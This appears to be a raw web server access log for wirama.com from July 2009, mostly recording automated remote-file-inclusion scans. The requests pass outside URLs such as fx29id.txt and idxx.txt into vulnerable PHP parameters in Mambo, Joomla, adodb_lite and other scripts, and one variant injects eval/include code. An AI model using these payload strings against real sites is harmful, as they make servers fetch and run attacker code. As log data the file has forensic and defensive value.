211.45.176.74 - - [31/Jul/2009:00:29:36 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
208.113.196.16 - - [31/Jul/2009:00:29:59 -0700] "GET /logs/access_090401.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.amataklubs.lv/ilga/2d/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
208.113.196.16 - - [31/Jul/2009:00:29:59 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.amataklubs.lv/ilga/2d/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
208.113.196.16 - - [31/Jul/2009:00:29:59 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.amataklubs.lv/ilga/2d/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
211.45.176.74 - - [31/Jul/2009:00:30:11 -0700] "GET /logs/access_090330.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
208.113.196.16 - - [31/Jul/2009:00:30:25 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.amataklubs.lv/ilga/2d/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
208.113.196.16 - - [31/Jul/2009:00:30:25 -0700] "GET /logs/access_090401.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.amataklubs.lv/ilga/2d/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
208.113.196.16 - - [31/Jul/2009:00:30:25 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.amataklubs.lv/ilga/2d/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
211.45.176.74 - - [31/Jul/2009:00:39:27 -0700] "GET /logs/access_090331.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
211.45.176.74 - - [31/Jul/2009:00:39:27 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
211.45.176.74 - - [31/Jul/2009:00:39:27 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
211.45.176.74 - - [31/Jul/2009:00:40:27 -0700] "GET /logs/access.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
211.45.176.74 - - [31/Jul/2009:00:41:47 -0700] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
211.45.176.74 - - [31/Jul/2009:00:41:47 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
211.45.176.74 - - [31/Jul/2009:00:41:47 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
211.45.176.74 - - [31/Jul/2009:00:42:00 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
211.45.176.74 - - [31/Jul/2009:00:42:00 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
211.45.176.74 - - [31/Jul/2009:00:42:00 -0700] "GET /logs/access_090531.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
211.45.176.74 - - [31/Jul/2009:00:42:00 -0700] "GET /logs/access_090501.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
211.45.176.74 - - [31/Jul/2009:00:47:22 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
211.45.176.74 - - [31/Jul/2009:00:47:22 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
211.45.176.74 - - [31/Jul/2009:00:47:22 -0700] "GET /logs/access_090531.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
211.45.176.74 - - [31/Jul/2009:00:49:22 -0700] "GET /logs/access_090331.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
210.109.108.146 - - [31/Jul/2009:00:57:53 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.waawaa.com//Partner/order/readme.txt??? HTTP/1.1" 200 2565 "-" "libwww-perl/5.79" "wirama.com"
210.109.108.146 - - [31/Jul/2009:00:57:53 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.waawaa.com//Partner/order/readme.txt??? HTTP/1.1" 200 2565 "-" "libwww-perl/5.79" "wirama.com"
210.109.108.146 - - [31/Jul/2009:00:57:54 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.waawaa.com//Partner/order/readme.txt??? HTTP/1.1" 200 916 "-" "libwww-perl/5.79" "wirama.com"
210.109.108.146 - - [31/Jul/2009:00:57:54 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.waawaa.com//Partner/order/readme.txt??? HTTP/1.1" 200 916 "-" "libwww-perl/5.79" "wirama.com"
70.85.213.106 - - [31/Jul/2009:01:01:42 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.delawarepokernews.com/images/baner.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
70.85.213.106 - - [31/Jul/2009:01:01:43 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.delawarepokernews.com/images/baner.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
70.85.213.106 - - [31/Jul/2009:01:01:43 -0700] "GET /logs/access_090601.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.delawarepokernews.com/images/baner.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
70.85.213.106 - - [31/Jul/2009:01:03:07 -0700] "GET /logs/access_090401.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.delawarepokernews.com/images/baner.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
72.30.142.97 - - [31/Jul/2009:01:17:25 -0700] "GET /jobs.html HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
211.45.176.74 - - [31/Jul/2009:01:39:35 -0700] "GET /logs/access_090601.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
211.45.176.74 - - [31/Jul/2009:01:39:35 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
211.45.176.74 - - [31/Jul/2009:01:39:35 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
211.45.176.74 - - [31/Jul/2009:01:40:09 -0700] "GET /logs/access_090501.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
211.45.176.74 - - [31/Jul/2009:01:40:09 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
211.45.176.74 - - [31/Jul/2009:01:40:09 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
211.45.176.74 - - [31/Jul/2009:01:42:18 -0700] "GET /logs/access_090401.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
211.45.176.74 - - [31/Jul/2009:01:42:18 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
211.45.176.74 - - [31/Jul/2009:01:42:18 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
211.45.176.74 - - [31/Jul/2009:01:42:33 -0700] "GET /logs/access_090501.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
211.45.176.74 - - [31/Jul/2009:01:42:33 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
211.45.176.74 - - [31/Jul/2009:01:42:33 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
211.45.176.74 - - [31/Jul/2009:01:42:33 -0700] "GET /logs/access_090329.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
211.45.176.74 - - [31/Jul/2009:01:43:00 -0700] "GET /logs/access_090601.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
74.200.90.19 - - [31/Jul/2009:01:44:38 -0700] "GET /logs/access_090501.log//historytemplate.php?cms[tngpath]=http://comhelp.spb.ru//idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
74.200.90.19 - - [31/Jul/2009:01:44:38 -0700] "GET /historytemplate.php?cms[tngpath]=http://comhelp.spb.ru//idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
74.200.90.19 - - [31/Jul/2009:01:44:38 -0700] "GET /logs//historytemplate.php?cms[tngpath]=http://comhelp.spb.ru//idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
74.200.90.19 - - [31/Jul/2009:01:44:46 -0700] "GET /logs/access_090501.log%20%20//historytemplate.php?cms[tngpath]=http://comhelp.spb.ru//idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
74.200.90.19 - - [31/Jul/2009:01:44:46 -0700] "GET /logs//historytemplate.php?cms[tngpath]=http://comhelp.spb.ru//idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
74.200.90.19 - - [31/Jul/2009:01:44:46 -0700] "GET /historytemplate.php?cms[tngpath]=http://comhelp.spb.ru//idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
74.200.90.19 - - [31/Jul/2009:01:44:49 -0700] "GET /logs/access_090329.log//historytemplate.php?cms[tngpath]=http://comhelp.spb.ru//idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
74.200.90.19 - - [31/Jul/2009:01:44:55 -0700] "GET /logs/access_090329.log%20%20//historytemplate.php?cms[tngpath]=http://comhelp.spb.ru//idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
74.200.90.19 - - [31/Jul/2009:01:46:13 -0700] "GET /logs//historytemplate.php?cms[tngpath]=http://comhelp.spb.ru//idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
74.200.90.19 - - [31/Jul/2009:01:46:17 -0700] "GET /historytemplate.php?cms[tngpath]=http://comhelp.spb.ru//idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
74.200.90.19 - - [31/Jul/2009:01:46:17 -0700] "GET /logs/access_090501.log//historytemplate.php?cms[tngpath]=http://comhelp.spb.ru//idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
74.200.90.19 - - [31/Jul/2009:01:46:22 -0700] "GET /logs/access_090329.log//historytemplate.php?cms[tngpath]=http://comhelp.spb.ru//idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
74.200.90.19 - - [31/Jul/2009:01:46:27 -0700] "GET /logs/access_090501.log//historytemplate.php?cms[tngpath]=http://comhelp.spb.ru//idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
74.200.90.19 - - [31/Jul/2009:01:46:27 -0700] "GET /historytemplate.php?cms[tngpath]=http://comhelp.spb.ru//idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
74.200.90.19 - - [31/Jul/2009:01:46:27 -0700] "GET /logs//historytemplate.php?cms[tngpath]=http://comhelp.spb.ru//idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
74.200.90.19 - - [31/Jul/2009:01:46:34 -0700] "GET /logs/access_090329.log//historytemplate.php?cms[tngpath]=http://comhelp.spb.ru//idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
72.30.142.97 - - [31/Jul/2009:02:21:04 -0700] "GET /?D=A HTTP/1.0" 200 900 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
72.30.142.97 - - [31/Jul/2009:02:31:18 -0700] "GET /?N=A HTTP/1.0" 200 900 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
174.37.136.126 - - [31/Jul/2009:02:36:02 -0700] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://tsv-aitrach.de/components/com_virtuemart/rs/copyright???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
174.37.136.126 - - [31/Jul/2009:02:36:02 -0700] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://tsv-aitrach.de/components/com_virtuemart/rs/copyright???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
174.37.136.126 - - [31/Jul/2009:02:36:02 -0700] "GET /logs/access_090601.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://tsv-aitrach.de/components/com_virtuemart/rs/copyright???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
174.37.136.126 - - [31/Jul/2009:02:37:24 -0700] "GET /logs/access_090401.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://tsv-aitrach.de/components/com_virtuemart/rs/copyright???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
87.106.210.178 - - [31/Jul/2009:02:44:40 -0700] "GET /logs/access_090601.log//?_zb_path=http://infozack.com/images/img08.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
87.106.210.178 - - [31/Jul/2009:02:44:40 -0700] "GET /?_zb_path=http://infozack.com/images/img08.jpg?? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "wirama.com"
87.106.210.178 - - [31/Jul/2009:02:44:41 -0700] "GET /logs//?_zb_path=http://infozack.com/images/img08.jpg?? HTTP/1.1" 200 2564 "-" "Mozilla/5.0" "wirama.com"
87.106.210.178 - - [31/Jul/2009:02:44:56 -0700] "GET /logs/access_090330.log//?_zb_path=http://infozack.com/images/img08.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
123.242.165.138 - - [31/Jul/2009:02:49:40 -0700] "GET /logs/access_090601.log//include/mail.inc.php?skin_board_path=http://lec.chonbuk.ac.kr/bak/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
123.242.165.138 - - [31/Jul/2009:02:49:40 -0700] "GET /logs//include/mail.inc.php?skin_board_path=http://lec.chonbuk.ac.kr/bak/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
123.242.165.138 - - [31/Jul/2009:02:49:40 -0700] "GET /include/mail.inc.php?skin_board_path=http://lec.chonbuk.ac.kr/bak/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
123.242.165.138 - - [31/Jul/2009:02:51:29 -0700] "GET /logs/access_090401.log//include/mail.inc.php?skin_board_path=http://lec.chonbuk.ac.kr/bak/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
213.189.224.21 - - [31/Jul/2009:03:01:30 -0700] "GET /logs/access_090601.log//?_zb_path=http://infozack.com/images/img08.jpg???? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "wirama.com"
213.189.224.21 - - [31/Jul/2009:03:01:30 -0700] "GET /?_zb_path=http://infozack.com/images/img08.jpg???? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "wirama.com"
213.189.224.21 - - [31/Jul/2009:03:01:30 -0700] "GET /logs//?_zb_path=http://infozack.com/images/img08.jpg???? HTTP/1.1" 200 2564 "-" "Mozilla/5.0" "wirama.com"
213.189.224.21 - - [31/Jul/2009:03:02:35 -0700] "GET /logs/access_090330.log//?_zb_path=http://infozack.com/images/img08.jpg???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
65.55.208.52 - - [31/Jul/2009:03:04:40 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.52 - - [31/Jul/2009:03:04:40 -0700] "GET /logs/access_090701.log HTTP/1.1" 200 1114112 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
91.121.106.59 - - [31/Jul/2009:03:33:00 -0700] "GET /logs/access_090329.log HTTP/1.1" 206 500001 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.wirama.com"
209.172.33.230 - - [31/Jul/2009:03:34:10 -0700] "GET /logs/access_090701.log//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.bu.ac.th/en/hotnews/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
209.172.33.230 - - [31/Jul/2009:03:34:10 -0700] "GET /logs//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.bu.ac.th/en/hotnews/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
209.172.33.230 - - [31/Jul/2009:03:34:10 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.bu.ac.th/en/hotnews/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
80.82.208.58 - - [31/Jul/2009:03:35:46 -0700] "GET /logs/access_090531.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.wattenhofer.com/charts//pit-id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.wirama.com"
80.82.208.58 - - [31/Jul/2009:03:35:46 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.wattenhofer.com/charts//pit-id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.wirama.com"
80.82.208.58 - - [31/Jul/2009:03:35:46 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.wattenhofer.com/charts//pit-id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.wirama.com"
202.125.45.45 - - [31/Jul/2009:03:37:49 -0700] "GET /indexprova.php?option=com_extcalendar&task=§ionid=&id=&mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
202.125.45.45 - - [31/Jul/2009:03:37:49 -0700] "GET /logs/indexprova.php?option=com_extcalendar&task=§ionid=&id=&mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
209.172.33.230 - - [31/Jul/2009:03:39:15 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.bu.ac.th/en/hotnews/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
209.172.33.230 - - [31/Jul/2009:03:39:15 -0700] "GET /logs//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.bu.ac.th/en/hotnews/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
209.172.33.230 - - [31/Jul/2009:03:39:15 -0700] "GET /logs/access_090601.log//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.bu.ac.th/en/hotnews/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
218.150.78.235 - - [31/Jul/2009:03:41:27 -0700] "GET /?APB_rp=http://www.zvezda-spb.ru/images/zvezda_42.jpg?%0D?? HTTP/1.1" 200 916 "-" "libwww-perl/5.79" "wirama.com"
218.150.78.235 - - [31/Jul/2009:03:41:27 -0700] "GET /logs/?APB_rp=http://www.zvezda-spb.ru/images/zvezda_42.jpg?%0D?? HTTP/1.1" 200 2559 "-" "libwww-perl/5.79" "wirama.com"
220.133.40.130 - - [31/Jul/2009:03:41:30 -0700] "GET /logs//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.bu.ac.th/en/hotnews/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
220.133.40.130 - - [31/Jul/2009:03:41:30 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.bu.ac.th/en/hotnews/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
62.140.23.185 - - [31/Jul/2009:03:41:32 -0700] "GET /logs/access_090601.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://tsv-aitrach.de/components/com_virtuemart/rs/copyright???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
62.140.23.185 - - [31/Jul/2009:03:41:32 -0700] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://tsv-aitrach.de/components/com_virtuemart/rs/copyright???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
62.140.23.185 - - [31/Jul/2009:03:41:32 -0700] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://tsv-aitrach.de/components/com_virtuemart/rs/copyright???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
220.133.40.130 - - [31/Jul/2009:03:41:32 -0700] "GET /logs/access_090701.log//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.bu.ac.th/en/hotnews/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
62.140.23.185 - - [31/Jul/2009:03:43:30 -0700] "GET /logs/access_090401.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://tsv-aitrach.de/components/com_virtuemart/rs/copyright???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
216.14.123.202 - - [31/Jul/2009:03:47:10 -0700] "GET /mygallerybrowser.php?myPath=http://www.balans-arnhem.nl/templates/beez/css/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.wirama.com"
216.14.123.202 - - [31/Jul/2009:03:47:10 -0700] "GET /logs/mygallerybrowser.php?myPath=http://www.balans-arnhem.nl/templates/beez/css/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.wirama.com"
216.14.123.202 - - [31/Jul/2009:03:47:10 -0700] "GET /logs/access.log/mygallerybrowser.php?myPath=http://www.balans-arnhem.nl/templates/beez/css/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.wirama.com"
202.125.45.45 - - [31/Jul/2009:03:50:11 -0700] "GET /logs/indexprova.php?option=com_jce&task=§ionid=&id=&mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
202.125.45.45 - - [31/Jul/2009:03:50:11 -0700] "GET /indexprova.php?option=com_jce&task=§ionid=&id=&mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
216.14.123.202 - - [31/Jul/2009:03:53:13 -0700] "GET /logs/mygallerybrowser.php?myPath=http://www.balans-arnhem.nl/templates/beez/css/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "wirama.com"
216.14.123.202 - - [31/Jul/2009:03:53:13 -0700] "GET /mygallerybrowser.php?myPath=http://www.balans-arnhem.nl/templates/beez/css/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "wirama.com"
